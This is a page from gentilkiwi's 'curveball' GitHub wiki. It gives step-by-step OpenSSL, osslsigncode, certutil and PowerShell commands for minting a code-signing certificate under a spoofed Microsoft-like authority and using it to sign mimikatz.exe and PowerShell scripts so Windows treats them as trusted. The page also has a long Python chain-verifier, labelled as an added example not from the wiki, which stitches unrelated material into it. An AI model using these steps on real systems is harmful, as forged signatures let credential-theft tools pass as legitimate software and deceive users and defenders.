2. Kiwi Legit CodeSigning - gentilkiwi/curveball GitHub Wiki

Now that you have a Certificate Authority [...]

OpenSSL shared configuration for CodeSigning

Create a cs.cnf OpenSSL config file with

extensions = extensions

[req]
prompt = no
utf8 = no
distinguished_name = req_distinguished_name
x509_extensions = extensions

[req_distinguished_name]

[extensions]
basicConstraints=critical, CA:FALSE
subjectKeyIdentifier=hash
keyUsage=critical, digitalSignature
extendedKeyUsage=codeSigning
# crlDistributionPoints=crlDistributionPoint
#
# [crlDistributionPoint]
  • CRL Distribution Point may make the pseudo-validation fail.

Create RSA private key & signed certificate with the legit authority

openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out cs_microsoft_product.key

openssl req -config cs.cnf -new -sha256 -key cs_microsoft_product.key -subj "/C=FR/CN=Kiwi Microsoft ECC Product Code Signing" -out cs_microsoft_product.csr

openssl x509 -req -extfile cs.cnf -in cs_microsoft_product.csr -CA microsoft_product.crt -CAkey ./private/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.key -CAcreateserial -out cs_microsoft_product.crt -days +1825

Must give you:

Signature ok
subject=C = FR, CN = Kiwi Microsoft ECC Product Code Signing
Getting CA Private Key

and files: cs_microsoft_product.key & cs_microsoft_product.crt (you can delete cs_microsoft_product.csr & microsoft_product.srl)

Use the CodeSigning certificate

Authenticode with osslsigncode

PE (exe/dll/sys/...), MSI & CAB

cat cs_microsoft_product.crt microsoft_product.crt ./public/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt > cs_microsoft_product.legit_with_real.crt

This gives a bundle with the code signing certificate, the legit certificate authority and the real one: it will 'force' Windows to acquire the real one if it is not already in the root certificate store.

osslsigncode sign -certs cs_microsoft_product.legit_with_real.crt -key cs_microsoft_product.key -n "mimikatz 2.2.0" -i http://blog.gentilkiwi.com/mimikatz -t http://timestamp.digicert.com -in ../mimikatz/x64/mimikatz.exe -out mimikatz_microsoft_product.exe -h sha1
osslsigncode sign -certs cs_microsoft_product.legit_with_real.crt -key cs_microsoft_product.key -n "mimikatz 2.2.0" -i http://blog.gentilkiwi.com/mimikatz -t http://timestamp.digicert.com -in mimikatz_microsoft_product.exe -out mimikatz_microsoft_product.exe -h sha256 -nest
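The bundle trick above only matters to a validator that accepts a presented CA by matching its name or key bytes against the store. As an added example (not code from the curveball wiki or from gentilkiwi), here is a small chain verifier that anchors trust on the store's own copy of the root key, so a bundled look-alike CA with the right name is simply ignored and the leaf's signature fails. Everything is constructed in memory with the `cryptography` library: the "Hypothetical ECC Product Root CA" and publisher names are placeholders, and the leaf gets the same extension profile as `cs.cnf` (CA:FALSE, digitalSignature, codeSigning).

```python
# Added example (not from the curveball wiki): verify a code-signing chain against
# the trust store's key, never against a bundled certificate that merely carries the
# anchor's name. All certificates and names below are constructed placeholders.
from datetime import datetime, timedelta, timezone
from cryptography import x509
from cryptography.x509.oid import ExtendedKeyUsageOID, NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec, padding, rsa

def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, "FR"),
                      x509.NameAttribute(NameOID.COMMON_NAME, cn)])

def _builder(subject, issuer, pubkey, days):
    now = datetime.now(timezone.utc)
    return (x509.CertificateBuilder()
            .subject_name(subject).issuer_name(issuer).public_key(pubkey)
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - timedelta(days=1))
            .not_valid_after(now + timedelta(days=days)))

def make_ca(cn, key, issuer=None, issuer_key=None):
    """CA certificate; self-signed when no issuer is given (hypothetical roots)."""
    issuer_name = issuer.subject if issuer else _name(cn)
    return (_builder(_name(cn), issuer_name, key.public_key(), 3650)
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(issuer_key or key, hashes.SHA256()))

def make_code_signing_leaf(cn, key, ca_cert, ca_key):
    """Leaf with the cs.cnf profile: CA:FALSE, SKI, digitalSignature, codeSigning EKU."""
    ku = x509.KeyUsage(digital_signature=True, content_commitment=False,
                       key_encipherment=False, data_encipherment=False,
                       key_agreement=False, key_cert_sign=False, crl_sign=False,
                       encipher_only=False, decipher_only=False)
    return (_builder(_name(cn), ca_cert.subject, key.public_key(), 1825)
            .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
            .add_extension(x509.SubjectKeyIdentifier.from_public_key(key.public_key()), critical=False)
            .add_extension(ku, critical=True)
            .add_extension(x509.ExtendedKeyUsage([ExtendedKeyUsageOID.CODE_SIGNING]), critical=False)
            .sign(ca_key, hashes.SHA256()))

def signed_by(cert, issuer_pubkey):
    """True iff cert's signature verifies under issuer_pubkey (RSA PKCS#1 v1.5 or ECDSA)."""
    try:
        if isinstance(issuer_pubkey, rsa.RSAPublicKey):
            issuer_pubkey.verify(cert.signature, cert.tbs_certificate_bytes,
                                 padding.PKCS1v15(), cert.signature_hash_algorithm)
        elif isinstance(issuer_pubkey, ec.EllipticCurvePublicKey):
            issuer_pubkey.verify(cert.signature, cert.tbs_certificate_bytes,
                                 ec.ECDSA(cert.signature_hash_algorithm))
        else:
            return False
        return True
    except Exception:  # InvalidSignature, or key/algorithm mismatch
        return False

def _is_ca(cert):
    try:
        return cert.extensions.get_extension_for_class(x509.BasicConstraints).value.ca
    except x509.ExtensionNotFound:
        return False

def verify_code_signing_chain(leaf, presented, trust_store):
    """Walk leaf -> presented intermediates -> trust anchor. Once an issuer name
    matches an anchor, the signature is checked with the anchor's key from the
    store; a presented certificate carrying that name is never consulted."""
    try:
        eku = leaf.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
    except x509.ExtensionNotFound:
        return False
    if ExtendedKeyUsageOID.CODE_SIGNING not in eku:
        return False
    anchors = {c.subject: c for c in trust_store}
    cert = leaf
    for _ in range(len(presented) + 1):  # bounded walk: a cyclic bundle cannot loop
        if cert.issuer in anchors:
            return signed_by(cert, anchors[cert.issuer].public_key())
        nxt = next((c for c in presented if c.subject == cert.issuer and c is not cert), None)
        if nxt is None or not _is_ca(nxt) or not signed_by(cert, nxt.public_key()):
            return False
        cert = nxt
    return False

def demo():
    """Constructed scenario: a genuine root->intermediate->leaf chain, then a
    look-alike self-signed CA that reuses the real root's name with its own key."""
    root_key = ec.generate_private_key(ec.SECP384R1())
    real_root = make_ca("Hypothetical ECC Product Root CA", root_key)  # placeholder root
    inter_key = ec.generate_private_key(ec.SECP256R1())
    inter = make_ca("Hypothetical Product CA", inter_key, real_root, root_key)
    pub_key = rsa.generate_private_key(65537, 2048)
    good_leaf = make_code_signing_leaf("Good Publisher", pub_key, inter, inter_key)
    rogue_key = ec.generate_private_key(ec.SECP384R1())
    rogue_ca = make_ca("Hypothetical ECC Product Root CA", rogue_key)  # same name, other key
    rogue_leaf = make_code_signing_leaf("Look-alike Publisher", pub_key, rogue_ca, rogue_key)
    store = [real_root]
    # Bundling the real root beside the look-alike changes nothing for this verifier.
    return (verify_code_signing_chain(good_leaf, [inter], store),
            verify_code_signing_chain(rogue_leaf, [rogue_ca, real_root], store))
```

`demo()` returns `(True, False)`: the genuine chain validates through the intermediate up to the stored root, while the look-alike leaf is rejected because its issuer name resolves to the anchor in the store and the signature is checked with that anchor's real key, not with the key inside the bundled certificate. The bounded loop and the `_is_ca` check are there so a bundle cannot send the walk in circles or route through an end-entity certificate.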

Results

[screenshot: images/cs_property.png]

[screenshot: images/cs_uac.png]

PowerShell script

PowerShell needs the certificate to be installed on the signer computer, or a PKCS#12 file. Here we use the installed certificate to be able to include the certificate authority in the chain.

Unfortunately, it's not natively possible to include the real authority. Be sure to select a certificate authority already on the system (like the Microsoft one in modern Windows 10 versions).

openssl pkcs12 -export -password pass:waza -keysig -in cs_microsoft_product.crt -inkey cs_microsoft_product.key -out cs_microsoft_product.p12

Import certificates

on the signer computer

certutil -user -f -addstore root c:\security\curveball\microsoft_product.crt

certutil -user -f -p waza -importpfx c:\security\curveball\cs_microsoft_product.p12 NoChain,AT_SIGNATURE

Sign hello.ps1

on the signer computer

powershell -Command "Set-AuthenticodeSignature -Certificate (Get-ChildItem -Path 'Cert:\CurrentUser\My' -CodeSigningCert | Where-Object {$_.Subject -EQ 'CN=Kiwi Microsoft ECC Product Code Signing, C=FR'}) -IncludeChain 'All' -HashAlgorithm 'SHA256' -TimestampServer 'http://timestamp.digicert.com' -FilePath 'hello.ps1'"

Results

# if not already in a signed policy (see: Get-ExecutionPolicy -List)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy AllSigned -Force
# if you want to compare with another one
.\Desktop\hello_not_signed.ps1
# your signed script
.\Desktop\hello.ps1

[screenshot: images/cs_powershell.png]